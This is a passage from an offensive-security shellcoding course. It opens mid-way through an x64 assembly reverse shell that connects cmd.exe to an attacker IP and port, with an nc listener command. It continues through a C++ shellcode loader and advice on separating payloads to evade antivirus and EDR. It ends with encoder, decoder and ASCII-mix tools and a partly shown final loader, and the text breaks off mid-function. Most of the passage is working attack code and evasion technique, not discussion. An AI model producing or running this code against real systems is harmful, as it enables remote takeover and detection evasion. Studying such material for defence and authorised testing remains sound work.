xor rax, rax
push rax
push rax
push rax
sub rsp, 0x20
call WSAConnect
add rsp, 0x38

; ── Populate STARTUPINFOA ── (the most painful part of the reverse shell)
; Fields: cb(DWORD), reserved(PTR), desktop(PTR), title(PTR),
;         dwX/Y/XSize/YSize(DWORDs), wShowWindow(WORD), cbReserved2(WORD),
;         lpReserved2(PTR), hStdInput/Output/Error(HANDLE) — redirected to socket!
; We push fields in reverse order (stack grows down)

xor rax, rax
; hStdError, hStdOutput, hStdInput — all set to socket handle
push rdi                   ; hStdError = socket
push rdi                   ; hStdOutput = socket
push rdi                   ; hStdInput = socket
push rax                   ; lpReserved2 = NULL
; wShowWindow=1 and cbReserved2=0 packed into DWORD, dwFlags=0x100 (STARTF_USESTDHANDLES)
push 0x0001010000000000    ; wShowWindow|cbReserved2 + dwFlags=STARTF_USESTDHANDLES
push rax                   ; dwYCountChars/dwXCountChars
push rax                   ; dwYSize/dwXSize
push rax                   ; dwY/dwX
push rax                   ; lpTitle
push rax                   ; lpDesktop
push rax                   ; lpReserved
mov eax, 0x68              ; cb = sizeof(STARTUPINFOA) = 104 (0x68)
push rax
mov rax, rsp               ; RAX = &STARTUPINFOA

; ── CreateProcessA(NULL, "cmd.exe", ..., &STARTUPINFOA, &PROCESS_INFORMATION) ──
xor rcx, rcx               ; lpApplicationName = NULL
; push "cmd.exe" string and set RDX...
sub rsp, 0x30
call CreateProcessA
add rsp, 0x30

; ── ExitProcess(0) ──
xor rcx, rcx
sub rsp, 0x30
call ExitProcess

⚠ Replace 0x6401A8C0 (192.168.1.100) and 0x5C11 (port 4444) with your actual attacker IP and port in network byte order before testing. Verify your listener is running: nc -lvnp 4444

STARTUPINFOA is notoriously painful in x64 assembly because its fields use mixed sizes (DWORD, WORD, QWORD) and x64 stack alignment requirements mean you can't just push them naively. The key fields for a reverse shell:
- cb (DWORD, +0x00) = 0x68 (104 bytes — sizeof the structure)
- dwFlags (DWORD, +0x2C) = STARTF_USESTDHANDLES (0x100) — tells CreateProcess to use hStdInput/Output/Error
- wShowWindow (WORD, +0x30) = 1 (SW_SHOWNORMAL) or 0 (hidden)
- hStdInput (HANDLE, +0x38) = socket handle
- hStdOutput (HANDLE, +0x40) = socket handle
- hStdError (HANDLE, +0x48) = socket handle
In x86 this is much easier — no alignment padding needed. In x64, the padding between WORD fields and the next QWORD-aligned field is where most bugs hide.

💡 Use x64dbg to inspect the structure after pushing all the fields. Navigate to the RSP address and verify each field offset visually against the MSDN STARTUPINFOA documentation.
WSASocketA and WSAConnect both take more than 4 parameters. Parameters 5+ go on the stack at RSP+0x28, RSP+0x30, etc. (above the 4-register slots and the 0x20 shadow space). This is first instance in this course with more than 4 parameters being passed.

The push order is reversed — push the last parameter first, working backward to the 5th. Then allocate shadow space with sub rsp, 0x20 and call. After the call, restore RSP by adding back (shadow space + pushed parameter bytes).

⚠ Getting the RSP math wrong for 5+ parameter functions is the #1 cause of crashes in this module. Count your pushes carefully and verify stack alignment before the call in x64dbg.
TCP socket structures use big-endian (network) byte order for IP addresses and ports. Since x64 is little-endian, you need to byte-swap before embedding the values in your shellcode.

Port 4444 conversion: 4444 decimal = 0x115C hex → big-endian bytes = 0x11 0x5C → as a WORD in little-endian storage = 0x5C11

IP 192.168.1.100 conversion: bytes are 0xC0 0xA8 0x01 0x64 → as a DWORD in little-endian storage = 0x6401A8C0

💡 Python: import socket; print(hex(socket.htonl(0xC0A80164))) — htonl handles the byte swap for you. For ports: hex(socket.htons(4444))

Module Seven

Pure x64 Assembly Reverse Shell

// No externs. No training wheels. 500+ lines of pure assembly.

Learning Objectives

Dynamically resolve all Winsock APIs (WSAStartup, WSASocketA, WSAConnect) via PE walking
Load ws2_32.dll at runtime using LoadLibraryA resolved from kernel32
Build a complete NULL-free reverse shell in pure position-independent x64 assembly
Understand why this is the "final exam" of x64 shellcode development

The Final Exam

This module is the culmination of everything in the course. No externs, no shortcuts — every API is resolved at runtime using the techniques from Modules 2–5. All strings are NULL-free using the techniques from Modules 3–4. The result is position-independent shellcode that can be extracted as raw bytes and executed in any context.

The code is long — 500+ lines — but if you've worked through the previous modules it's not magic. It's the same patterns repeated: PEB walk, PE export walk, string push, API call. The only new complexity is ws2_32.dll (which must be loaded via LoadLibraryA since it's not pre-loaded in most processes) and the full STARTUPINFOA structure population without any extern help.

ℹ The complete source for this module is available as a downloadable NASM file in the course materials. The code walkthrough below highlights the key structural sections. Full inline comments explain every instruction.

      NASM x64
      revshell_pure.asm — structural overview of pure dynamic reverse shell
    
; revshell_pure.asm — g3tsyst3m Module 7
; Pure x64 assembly reverse shell — no externs, fully dynamic API resolution
; Full source: see course download. This shows the top-level structure.
;
; === SECTION 1: Prologue + PEB Walk → kernel32 base ===
BITS 64
section .text
global main

main:
sub rsp, 0x28
and rsp, 0xFFFFFFFFFFFFFFF0
; PEB → InMemoryOrderModuleList → kernel32 base → R8
mov rax, [gs:0x60]
mov rax, [rax+0x18]
mov rax, [rax+0x20]
mov rax, [rax]
mov rax, [rax]
mov r8,  [rax+0x20]         ; R8 = kernel32 base

; === SECTION 2: Resolve GetProcAddress + LoadLibraryA from kernel32 ===
; (full PE export table walk — same as Module 2, targeting "GetProcAddress" and "LoadLibraryA")
; Result: R13 = GetProcAddress, R15 = LoadLibraryA

; === SECTION 3: Load ws2_32.dll ===
; Push "ws2_32.dll" NULL-free, call LoadLibraryA
xor rax, rax
mov al, 0x6C
shl eax, 0x10
shr eax, 0x10              ; "l\0"
push rax
mov rax, 0x6C642E32335F3273  ; "s2_32.dl"
push rax
mov rcx, rsp
sub rsp, 0x30
call r15                   ; LoadLibraryA("ws2_32.dll")
add rsp, 0x30
mov rdi, rax               ; RDI = ws2_32.dll base

; === SECTION 4: Resolve WSAStartup, WSASocketA, WSAConnect from ws2_32 ===
; For each: push NULL-free encoded name, call GetProcAddress(rdi, name)
; Store results in non-volatile registers / push to stack for later

; === SECTION 5: Resolve CreateProcessA + ExitProcess from kernel32 ===

; === SECTION 6: WSAStartup → WSASocketA → WSAConnect ===
; Identical logic to Module 6 but calling dynamically resolved addresses

; === SECTION 7: STARTUPINFOA population + CreateProcessA ===
; Identical structure to Module 6 — hStdInput/Output/Error = socket

; === SECTION 8: ExitProcess(0) ===
xor rcx, rcx
sub rsp, 0x30
call r14                   ; ExitProcess(0)

Every Windows process has kernel32.dll and ntdll.dll pre-loaded in its address space — that's why we can find kernel32 via the PEB's InMemoryOrderModuleList without calling LoadLibrary first. But ws2_32.dll (Winsock) is not loaded by default in most processes. It must be explicitly loaded before its functions can be resolved.

The implication for shellcode: you need LoadLibraryA from kernel32 before you can get WSAStartup from ws2_32. This creates a dependency order: PEB walk → kernel32 base → LoadLibraryA + GetProcAddress → LoadLibraryA("ws2_32.dll") → GetProcAddress(ws2_32, "WSAStartup") etc.

💡 If your target process is a web server, database, or any network-aware application, ws2_32 is probably already loaded. You could skip LoadLibraryA and walk the PEB for it directly — but using LoadLibraryA is safer and works in all cases.
With this many API calls in play, disciplined register allocation is essential. The strategy used in the full course source:
- R8 — kernel32.dll base (set once in PEB walk, never reused)
- R13 — GetProcAddress (preserved after initial resolution)
- R15 — LoadLibraryA / current call target (repurposed as needed)
- RDI — ws2_32.dll base after LoadLibraryA call
- R12 — socket handle (set after WSASocketA, preserved through CreateProcess)
- R14 — ExitProcess / secondary resolved API
API addresses that are used only once are called immediately after resolution without storing in a non-volatile register — the volatile RAX return value is used directly. Only APIs called more than once (GetProcAddress, LoadLibraryA, ExitProcess) get permanent register homes.
After verifying the assembly compiles and runs correctly as an EXE, extract the raw shellcode bytes for use in a loader:
- nasm -f bin revshell_pure.asm -o revshell.bin — if using raw binary output (no PE wrapper)
- Or: compile to obj, then extract the .text section: objcopy -O binary -j .text revshell.obj revshell.bin
- Verify: python3 -c "d=open('revshell.bin','rb').read(); assert b'\\x00' not in d, 'NULLS FOUND'; print(f'CLEAN — {len(d)} bytes')"
- Format as C array: python3 -c "d=open('revshell.bin','rb').read(); print('unsigned char sc[] = {' + ','.join(hex(b) for b in d) + '};')"
💡 The course's final shellcode runs approximately 500-600 bytes. Future optimization using tighter function lookup loops can reduce this significantly — a topic for an advanced follow-on course.

Module Eight

Shellcode Execution & C++ Loaders

// Getting your shellcode off the disk and into memory

Learning Objectives

Build a C++ shellcode loader using VirtualAlloc + memcpy + function pointer
Understand PAGE_EXECUTE_READWRITE vs. safer VirtualProtect patterns
Embed shellcode as a C array and as a file-read from disk
Understand why the loader itself is the primary detection surface for modern EDR

The Standard Shellcode Loader

A shellcode loader's job is simple: get the shellcode bytes into executable memory and transfer control to them. The standard approach — VirtualAlloc with PAGE_EXECUTE_READWRITE, memcpy, then cast and call — is functional but heavily signatured by modern EDR. This module teaches the baseline that everything else builds on.

      C++
      loader.cpp — standard shellcode execution harness
    
// loader.cpp — g3tsyst3m Module 8
// Standard shellcode execution harness
// Build: cl.exe loader.cpp /link /out:loader.exe

#include <windows.h>
#include <iostream>

// Paste your extracted shellcode bytes here:
unsigned char shellcode[] =
    "\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9"
    "\x65\x48\x8b\x41\x60\x48\x8b\x40\x18\x48\x8b"
    /* ... full shellcode bytes ... */;

int main() {
    // Allocate RWX memory
    void* exec_mem = VirtualAlloc(
        nullptr,
        sizeof(shellcode),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );

    if (!exec_mem) {
        std::cerr << "[-] VirtualAlloc failed: " << GetLastError() << "\n";
        return 1;
    }
    std::cout << "[+] Allocated " << sizeof(shellcode)
              << " bytes at 0x" << exec_mem << "\n";

    // Copy shellcode into executable region
    memcpy(exec_mem, shellcode, sizeof(shellcode));

    // Cast to function pointer and execute
    auto sc_func = (void(*)())exec_mem;
    std::cout << "[+] Executing shellcode...\n";
    sc_func();

    // Should not reach here if shellcode calls ExitProcess
    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return 0;
}

Allocating memory as PAGE_EXECUTE_READWRITE (RWX) in one call is the most detectable loader pattern — EDR products specifically watch for VirtualAlloc with RWX permissions followed by a write and execution. A less obvious pattern uses two-step memory management:
- Allocate with PAGE_READWRITE (not executable)
- Write shellcode into the allocation
- Call VirtualProtect to change to PAGE_EXECUTE_READ
- Execute — memory is never simultaneously writable and executable
This pattern is more EDR-friendly and closer to how legitimate JIT compilers work. It doesn't eliminate detection but raises the behavioral analysis bar.

⚠ Neither pattern defeats modern behavioral EDR. The real evasion work happens at the loader level — process injection, stomping, indirect syscalls — topics covered in advanced EDR bypass content beyond this course.
Embedding shellcode as a hardcoded C array is simple but means the loader binary itself contains the shellcode — file-scanning AV will find it. An alternative is to read shellcode from a file at runtime:
- Store shellcode in an external file (optionally encrypted)
- Open with CreateFileA + ReadFile at runtime
- Decrypt if necessary, then VirtualAlloc + execute
This separates the loader from the payload — the loader binary is clean, and the shellcode file can be fetched from a remote URL, read from an alternate data stream, or stored in the registry to further complicate forensic recovery.

💡 For lab use, embedding as a C array is fine. For red team engagements, always separate loader from payload and consider encrypting the payload at rest.
Modern EDR products don't just scan for shellcode signatures — they monitor the behavioral sequence of API calls that loaders make. The VirtualAlloc → WriteProcessMemory/memcpy → VirtualProtect → CreateThread/CallFunction sequence is so well-known that it has dedicated behavioral detection rules in virtually every enterprise EDR product.

The shellcode itself being NULL-free and string-encoded matters primarily for static file scanning. Once you're in memory and executing, the EDR's eyes are on the loader's API call sequence, not the shellcode bytes.

Key detection telemetry a SOC analyst sees from a standard shellcode loader:
- ETW events for VirtualAlloc with executable permissions
- Sysmon Event 8 (CreateRemoteThread) if injection is used
- Network connections from the shellcode's reverse shell (Sysmon Event 3)
- cmd.exe spawned with unusual parent process (Sysmon Event 1)
⚠ This is why understanding the defender's perspective matters — knowing what EDR sees from your loader is as important as knowing how the shellcode works. The next course in this series covers advanced loader techniques and EDR evasion.
You've now completed the full x64 Assembly and Shellcoding 101 curriculum. Here's where these skills lead:
- Advanced x64 Assembly — tighter function lookup loops, position-independent data access via RIP-relative addressing, SYSCALL-based API resolution bypassing ntdll hooks
- EDR Evasion and Shellcode Loaders — process injection techniques, DLL stomping, indirect syscalls, sleep obfuscation, and shellcode encryption
- Exploit Development — applying your shellcode in buffer overflow, use-after-free, and heap exploitation contexts
- Reverse Engineering — reading other people's shellcode in x64dbg / Ghidra with the internals knowledge from this course
💡 The best next step is writing your own variants of everything in this course from scratch — without the notes. That's when you'll know you've actually internalized x64 assembly.

✓ Course Complete. You've gone from registers and stack alignment to a fully dynamic NULL-free reverse shell in pure x64 assembly. The code templates and full source files are in your course download. Now go break things — legally. 🐱

Module Nine

Python Shellcode Generator — TEB Walk, Extraction & NOT+XOR Encoding

// From .asm to encoded deploy-ready bytes — entirely on Windows, no VM needed

Learning Objectives

Write a TEB-based kernel32 locator that defeats EDR hooks on the standard PEB walk path
Use Python on Windows to extract raw shellcode bytes from a compiled .obj — no Linux VM required
Apply Bitwise NOT + XOR encoding in a single Python script to produce static-analysis-resistant shellcode
Understand how embedding the key inside the encoded payload enables self-decoding without hardcoding its position
Use the assembly junk-instruction inserter to produce different bytes on every compilation run

Why a New Kernel32 Walk? — Defeating EDR Hooks

The standard PEB walk from Module 2 traverses InMemoryOrderModuleList and trusts list position to find kernel32 — the third entry. This works on clean systems, but some EDR products (notably Avast) hook the initial loader modules. Walking by position can return the hooked version rather than the real kernel32 base.

The solution: instead of trusting position, search the module list for a module whose Unicode name starts with KERN. Unless the EDR names their hook KERNxx.dll, you skip right past the hook and land on real KERNEL32.DLL. This approach also starts from the TEB rather than directly from GS:[0x60] — a subtle but meaningful structural difference that adds resilience against intercepted fast paths.

Walk chain: GS:[0x30] → TEB base → [TEB+0x60] → PEB → [PEB+0x18] → PEB_LDR_DATA → [Ldr+0x10] → InMemoryOrderModuleList → iterate checking Unicode name bytes for KERN.

      NASM x64
      calc.asm — TEB-based kernel32 finder + WinExec("calc.exe")
    
; calc.asm — g3tsyst3m Module 9
; Compile: nasm -fwin64 calc.asm -o calc.obj
; Link:    ld -m i386pep -o calc.exe calc.obj
;
; Key difference from Module 2 PEB walk:
;   - Starts from TEB (GS:[0x30]) not PEB (GS:[0x60]) directly
;   - Searches for Unicode "KERN" rather than trusting list position
;   - Bypasses EDR hooks that intercept the standard 3rd-entry shortcut

BITS 64
SECTION .text
global main
main:
sub  rsp, 0x28
and  rsp, 0xFFFFFFFFFFFFFFF0
xor  rcx, rcx

; ── TEB → PEB ──────────────────────────────────────────────────────
mov  rax, [gs:0x30]         ; RAX = TEB base (GS:[0x30] always points to TEB)
mov  rax, [rax+0x60]        ; RAX = PEB base (TEB.PebBaseAddress at +0x60)

; ── PEB → LDR → InMemoryOrderModuleList ────────────────────────────
mov  rax, [rax+0x18]        ; RAX = PEB.Ldr (PEB_LDR_DATA*)
mov  rsi, [rax+0x10]        ; RSI = Ldr.InMemoryOrderModuleList.Flink

; ── Walk list searching for Unicode "KERN" ──────────────────────────
checkit:
mov  rsi, [rsi]
mov  rcx, [rsi+0x60]        ; RCX = pointer to module name Unicode buffer
mov  rbx, [rcx]             ; RBX = first 8 bytes of Unicode name
mov  rdx, 0x004E00520045004B  ; "K E R N" in UTF-16LE: K=004B E=0045 R=0052 N=004E
cmp  rbx, rdx
jz   foundit
jnz  checkit

foundit:
mov  rbx, [rsi+0x30]         ; RBX = DllBase (kernel32 base address)
mov  r8,  rbx                ; R8  = kernel32 base (non-volatile)

; ── Parse Export Address Table ──────────────────────────────────────
mov  ebx, [rbx+0x3C]
add  rbx, r8
xor  rcx, rcx
add  cx,  0x88ff             ; NULL-free way to build 0x88
shr  rcx, 0x8                ; RCX = 0x88
mov  edx, [rbx+rcx]          ; EDX = Export Directory RVA
add  rdx, r8                 ; RDX = Export Directory VMA
mov  r10d,[rdx+0x14]
xor  r11, r11
mov  r11d,[rdx+0x20]
add  r11, r8
mov  rcx, r10

; ── Push "WinExec" using NOT encoding + SHL/SHR null termination ────
mov  rax, 0x6F9C9A87BA9196A8  ; NOT-encoded "WinExec" — no plaintext in bytes
not  rax                     ; decode: RAX = 0x90636578456E6957
shl  rax, 0x8
shr  rax, 0x8                ; RAX = "WinExec\0" — null in MSB, not in shellcode bytes
push rax
mov  rax, rsp
add  rsp, 0x8

; ── Search AddressOfNames for "WinExec" ─────────────────────────────
kernel32findfunction:
jecxz FunctionNameNotFound
xor  ebx, ebx
mov  ebx, [r11+rcx*4]
add  rbx, r8
dec  rcx
mov  r9, [rax]
cmp  [rbx], r9
jz   FunctionNameFound
jnz  kernel32findfunction

FunctionNameNotFound:
int3

FunctionNameFound:
inc  ecx
xor  r11, r11
mov  r11d,[rdx+0x1c]
add  r11, r8
mov  r15d,[r11+rcx*4]
add  r15, r8                ; R15 = WinExec VMA

; ── Call WinExec("calc.exe", 1) ─────────────────────────────────────
xor  rax, rax
push rax
mov  rax, 0x9A879AD19C939E9C  ; NOT-encoded "calc.exe"
not  rax
push rax
mov  rcx, rsp
xor  rdx, rdx
inc  rdx
sub  rsp, 0x30
call r15

ℹ The Unicode comparison value 0x004E00520045004B encodes "K E R N" as UTF-16LE WORD pairs: K=004B, E=0045, R=0052, N=004E stored as an 8-byte little-endian immediate. A single cmp rbx, rdx checks all four characters simultaneously.

Tool 1 — findhex.py: Windows-Native Shellcode Extraction

Extracting raw shellcode bytes from a compiled .obj file historically required Linux tools. This Python script runs on Windows using the MinGW-bundled objdump. It parses the disassembly output, strips the byte columns, and outputs them as \xNN escape sequences ready to paste into a loader — no VM, no Linux, no context switch.

      Python
      findhex.py — extract \xNN shellcode bytes from .obj on Windows
    
# findhex.py — g3tsyst3m Module 9
# Extracts raw shellcode bytes from a NASM-compiled .obj file
# Requires: MinGW objdump in PATH (included with the NASM/MinGW toolchain)
# Usage:    python findhex.py calc.obj
# Output:   \x4d\x87\xe6\x48... printed to stdout

import re
import subprocess
import sys

def generateshellcode(obj_file):
    result = subprocess.run(
        ['objdump', '-D', obj_file],
        capture_output=True, text=True, check=True
    )
    objdump_output = result.stdout

    # Replace " <" so label text like "<main>" doesn't match the hex regex
    objdump_output = objdump_output.replace(" <", "--|")

    # Match exactly two hex chars followed by a space — the byte column format
    # Negative lookbehind prevents matching hex that's part of an address
    pattern = r'(?<![a-zA-Z])[0-9a-fA-F]{2} '
    matches = re.findall(pattern, objdump_output, flags=re.IGNORECASE)

    prefixed_hex = [r'\x' + m.strip() for m in matches]
    print(''.join(prefixed_hex))

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python findhex.py <.obj file>"); sys.exit(1)
    generateshellcode(sys.argv[1])

Tool 2 — NOT + XOR Encoder with Embedded Key

This encoder applies Bitwise NOT to every byte first, then XORs with a chosen key (default 0xAC). The result contains no recognizable API name strings and no common shellcode byte patterns. What makes it especially useful: the XOR key is embedded inside the encoded payload at position key_value % payload_length. Change the key and both the encoded bytes and the key's position in the output change — two layers of variability from one parameter.

The decoder stub reverses in order: XOR each byte with the key, then NOT — both operations are self-inverse so the decode is structurally identical to the encode.

      Python
      not_xor_encoder.py — Bitwise NOT + XOR with embedded key discovery
    
# not_xor_encoder.py — g3tsyst3m Module 9
# Two-pass encoder: NOT every byte, then XOR with key
# The key byte is embedded in the output at position (key % len) — self-locating
# Usage: paste findhex.py output into shellcode variable, then run this script
# Change xor_key to any non-null byte; 0xAC avoids bad chars for this shellcode

import sys

# Paste findhex.py output here:
shellcode = (
    b"\x4d\x87\xe6\x48\x83\xec\x28\x48\x8d\x3f\x48\x83\xe4\xf0"
    # ... full shellcode from findhex.py
)

xor_key = 0xAC

# Step 1 — Bitwise NOT every byte
not_encoded = bytearray((~b) & 0xFF for b in shellcode)

# Step 2 — XOR with key
not_xor = bytearray(b ^ xor_key for b in not_encoded)

# Step 3 — Embed key at deterministic position
# Position = key_value % payload_length
# Changing the key changes both the encoded bytes AND the position — double variability
key_pos = xor_key % len(not_xor)
encoded = bytearray(not_xor)
encoded.insert(key_pos, xor_key)

result = ''.join(f'\\x{b:02x}' for b in encoded)
print(f"[*] Encoded shellcode ({len(encoded)} bytes):")
print(result)
print()
print(f"[*] XOR key:          0x{xor_key:02x}")
print(f"[*] Key position:     offset {key_pos} in encoded output")
print(f"[*] Decode at runtime: XOR each byte with key, then NOT")

Tool 3 — The NOT+XOR Decoder in x64 Assembly

With the shellcode encoded, the runtime decoder needs to reverse both operations in correct order: XOR each byte with the key first, then NOT each byte. Because both NOT and XOR are self-inverse, the decode loop is structurally identical to how you'd write the encode — just applied at runtime in memory rather than at script time.

The key lives inside the encoded shellcode at a known index position — printed by the encoder script. For the example below, key index 38 was chosen: mov r9b, [rel encoded_shellcode + 38]. The decoder reads the key directly from the payload, walks every byte applying XOR then NOT, then reloads the base address and jumps to the now-restored shellcode via jmp rax.

      NASM x64
      decoder.asm — NOT+XOR decoder stub with encoded shellcode inline in .text
    
; decoder.asm — g3tsyst3m Module 9
; Compile: nasm -fwin64 decoder.asm
; Link:    ld -m i386pep -N -o decoder.exe decoder.obj
;
; -N flag: makes .text section writable+executable (needed because the decoder
;          writes decoded bytes back into encoded_shellcode in-place at runtime)
;
; Key index 38 was chosen from the not_xor_encoder.py output — the offset where
; the encoder embedded key byte 0xAC inside the encoded payload.

BITS 64

section .data

section .text
global main

main:
    ; ── Load base address of encoded_shellcode RIP-relative ────────────
    lea  rsi, [rel encoded_shellcode]
    ; ── Read the embedded key from its known index in the payload ──────
    mov  r9b, [rel encoded_shellcode + 38]  ; R9B = XOR key (0xAC at index 38)
    ; ── Set loop counter = payload length ──────────────────────────────
    mov  rcx, encoded_shellcode_len         ; immediate value, no rel needed for EQU

decode_loop:
    mov  al,  [rsi]                       ; AL = current encoded byte
    xor  al,  r9b                         ; AL ^= key  → reverses XOR encoding step
    not  al                               ; AL = ~AL  → reverses NOT encoding step
    mov  [rsi], al                       ; write original byte back in-place
    inc  rsi                              ; advance pointer
    loop decode_loop                     ; dec RCX, repeat until zero

    ; ── Jump to fully decoded shellcode ────────────────────────────────
    lea  rax, [rel encoded_shellcode]     ; reload base (RSI advanced past end during decode)
    jmp  rax                              ; execute the now-decoded calc shellcode

; ── NOT+XOR encoded payload — inline in .text ───────────────────────
; Generated by not_xor_encoder.py on the TEB-walk calc.asm shellcode.
; Key 0xAC embedded at offset 38 (the 0xAC byte at position [38]).
encoded_shellcode:
db 0x1e,0xd4,0xb5,0x1b,0xd0,0xbf,0x7b,0x1b,0xde,0x6c,0x1b,0xd0,0xb7,0xa3
db 0x1e,0xd4,0xa7,0x1b,0x62,0x9a,0x1a,0xd4,0xaf,0x36,0x1b,0xd8,0x57,0x76
db 0x63,0x53,0x53,0x53,0x1b,0xd8,0x13,0x33,0x1b,0x62,0xac,0x1b,0xd8,0x13
db 0x4b,0x1a,0xd4,0xad,0x1b,0xd8,0x23,0x43,0x1b,0xd0,0x94,0x53,0x1b,0xd8
db 0x65,0x1f,0xd4,0xbc,0x1b,0xd8,0x1d,0x33,0x1f,0xd4,0xbc,0x1b,0xd8,0x4a
db 0x1e,0xd4,0xbf,0x1b,0xe9,0x18,0x53,0x16,0x53,0x01,0x53,0x1d,0x53,0x1b
db 0x62,0xac,0x1b,0x6a,0x80,0x27,0x5b,0x1a,0xd4,0xaf,0x26,0x85,0x1f,0xd4
db 0xb4,0x1b,0xd8,0x0d,0x63,0x1e,0xda,0xa5,0x1a,0xda,0x8b,0x1e,0xd4,0xb6
db 0xd8,0x08,0x6f,0x1e,0x38,0xb7,0x52,0x1f,0x52,0x90,0x1e,0xda,0xb7,0x1b
db 0x62,0x9a,0x1a,0x92,0xb6,0x53,0x35,0xd2,0x92,0xac,0xdb,0x1e,0xd4,0xbd
db 0x1b,0x92,0xba,0x5b,0x1a,0x92,0x9f,0x53,0xd8,0x47,0x58,0x1f,0xd4,0xb4
db 0x1f,0x52,0x91,0x1e,0xda,0xbe,0x17,0xd8,0x01,0x47,0x1e,0x62,0xbe,0x1e
db 0x62,0x88,0x1a,0xd0,0xbf,0x53,0x17,0xd8,0x09,0x73,0x1a,0xd0,0xad,0x53
db 0x1e,0x52,0x90,0x1e,0xd4,0xbd,0x1f,0xda,0x82,0x1f,0xd4,0xbc,0x1b,0xeb
db 0xfb,0xc5,0xc2,0xe9,0xd4,0xc9,0xcf,0x3c,0x1b,0x92,0x9c,0x53,0x1b,0xa4
db 0x83,0x1a,0xd4,0xae,0x1b,0x92,0xb3,0x5b,0x1e,0xda,0xbe,0x1b,0x92,0xbb
db 0x5b,0x1e,0xd4,0xb5,0x03,0x1e,0xd6,0xa5,0x1b,0xda,0xb3,0x1a,0xd4,0xad
db 0x1b,0xd0,0x97,0x5b,0x1e,0xda,0xb7,0x34,0xb0,0x63,0x1a,0xd4,0xad,0x62
db 0x88,0x1a,0xd4,0xaf,0x12,0xd8,0x4f,0xd8,0x1b,0x92,0xb4,0x53,0x1f,0x52
db 0x90,0x1e,0xd4,0xb5,0x1b,0xac,0x9a,0x1a,0xd4,0xaf,0x1f,0xd8,0x5b,0x1e
db 0xd4,0xa7,0x1f,0x6a,0x58,0x27,0x5e,0x1e,0xd4,0xbd,0x26,0x82,0x1a,0x92
db 0xb5,0x53,0x9f,0x1a,0xd4,0xaf,0xac,0x92,0x1e,0xd6,0xb7,0x1e,0x62,0x88
db 0x1e,0xd4,0xa7,0x17,0xd8,0x09,0x4f,0x1f,0xd4,0xa4,0x1e,0x52,0x90,0x1e
db 0xd4,0xbf,0x16,0xd8,0x6f,0xd8,0x1a,0xd4,0xad,0x1e,0x52,0x94,0x1e,0x62
db 0xa5,0x1b,0x62,0x93,0x1a,0xd0,0x96,0x53,0x03,0x1a,0xd4,0xae,0x1b,0xeb
db 0xcf,0xcd,0xc0,0xcf,0x82,0xc9,0xd4,0xc9,0x1a,0xd0,0xaf,0x53,0x1b,0xa4
db 0x83,0x1e,0xd4,0xbd,0x03,0x1a,0xd4,0xad,0x1b,0xda,0xb2,0x1e,0xd6,0xb7
db 0x1b,0x62,0x81,0x1e,0xd4,0xbd,0x1b,0xac,0x91,0x1a,0xd4,0xad,0x1b,0xd0
db 0xbf,0x63,0x1a,0xd4,0xaf,0x12,0xac,0x84,0x1e,0xd4,0xa7,0x53,0x53,0x53
db 0x53,0x53
encoded_shellcode_len equ $ - encoded_shellcode

ℹ The -N linker flag (--omagic) marks the .text section writable+executable. This is required for the standalone test binary because the decoder writes decoded bytes back into encoded_shellcode in-place — which lives in .text. The C++ loader below uses PAGE_EXECUTE_READWRITE VirtualAlloc memory instead, so -N is not needed there.

Tool 4 — Alpha/Mix Encoding: Converting to ASCII-Printable Shellcode

The final encoding layer converts the complete payload (decoder stub + encoded shellcode) into a mixed ASCII/hex format where each byte is expressed as its printable ASCII character if one exists, and as a \xNN hex escape otherwise. This is the "alpha/mix" format — not purely alphanumeric, but as human-readable as the byte values allow, and compatible with C string literal delivery.

The workflow: compile decoder.asm to a .obj, run findhex.py on it to extract all bytes (decoder stub bytes + inline encoded shellcode), then pass that full byte string through the alpha/mix script. The output pastes directly into a C const unsigned char shellcode[] string literal — adjacent tokens are concatenated automatically by the compiler.

      Python
      alpha_mix.py — convert binary shellcode bytes to mixed ASCII/hex C string tokens
    
# alpha_mix.py — g3tsyst3m Module 9
# Converts binary shellcode to mixed ASCII/hex format for C string literals.
# Printable bytes → their ASCII character. Non-printable → \xNN escape.
# Special cases handle ' and " to avoid breaking C string literal syntax.
#
# Input:  hex_list = full payload bytes from findhex.py on the decoder .obj
#         (includes decoder stub bytes + encoded_shellcode bytes inline)
# Output: space-separated string tokens — paste into shellcode[] in loader.cpp

# Paste findhex.py output from decoder.obj here:
# (this is the full combined payload: decoder stub + encoded shellcode)
hex_list = (
    b"\x48\x8d\x35\x23\x00\x00\x00\x44\x8a\x0d\x42\x00\x00\x00"
    b"\xb9\x98\x01\x00\x00\x8a\x06\x44\x30\xc8\xf6\xd0\x88\x06"
    b"\x48\xff\xc6\xe2\xf2\x48\x8d\x05\x02\x00\x00\x00\xff\xe0"
    # ... followed by all encoded_shellcode bytes
)

alphanumericfinal = []
for bytey in hex_list:
    r = repr(chr(bytey))
    if bytey == 0x27:                       # single quote — C literal syntax break
        alphanumericfinal.append("\"\\'\"" )
    elif bytey == 0x22:                      # double quote — C literal syntax break
        alphanumericfinal.append('\"\\""')
    elif bytey == 0x20:                      # space — explicit hex to avoid ambiguity
        alphanumericfinal.append("\"\\x20\"")
    else:
        r = r.replace("'", '"')             # swap repr single quotes → double quotes
        alphanumericfinal.append(r)

print(' '.join(alphanumericfinal))            # space-separated: "H" "\x8d" "5" "#" ...

The Final C++ Loader

The alpha/mix output pastes directly into the shellcode[] array. The decoder stub runs first, decodes the embedded payload in-place, then jmp rax executes the original TEB-walk calc shellcode. PAGE_EXECUTE_READWRITE is required because the decoder modifies its own payload bytes at runtime — read+execute alone is insufficient.

      C++
      loader.cpp — final shellcode loader using the alpha/mix encoded payload
    
// loader.cpp — g3tsyst3m Module 9
// Paste alpha_mix.py output into shellcode[] below as adjacent string literals.
// The C compiler concatenates them into a single continuous byte array.
// Compile: x86_64-w64-mingw32-g++ -o loader.exe loader.cpp

#include <windows.h>
#include <iostream>

const unsigned char shellcode[] =
    "H" "\x8d" "5" "#" "\x00" "\x00" "\x00" "D" "\x8a" "\r" "B" "\x00" "\x00" "\x00" "¹" "\x98"
    "\x01" "\x00" "\x00" "\x8a" "\x06" "D" "0" "È" "ö" "Ð" "\x88" "\x06" "H" "ÿ" "Æ" "â"
    "ò" "H" "\x8d" "\x05" "\x02" "\x00" "\x00" "\x00" "ÿ" "à"
    /* ... paste full alpha_mix.py output here ... */ ;

int main() {
    size_t shellcode_size = sizeof(shellcode);

    // PAGE_EXECUTE_READWRITE required — decoder stub writes decoded bytes in-place
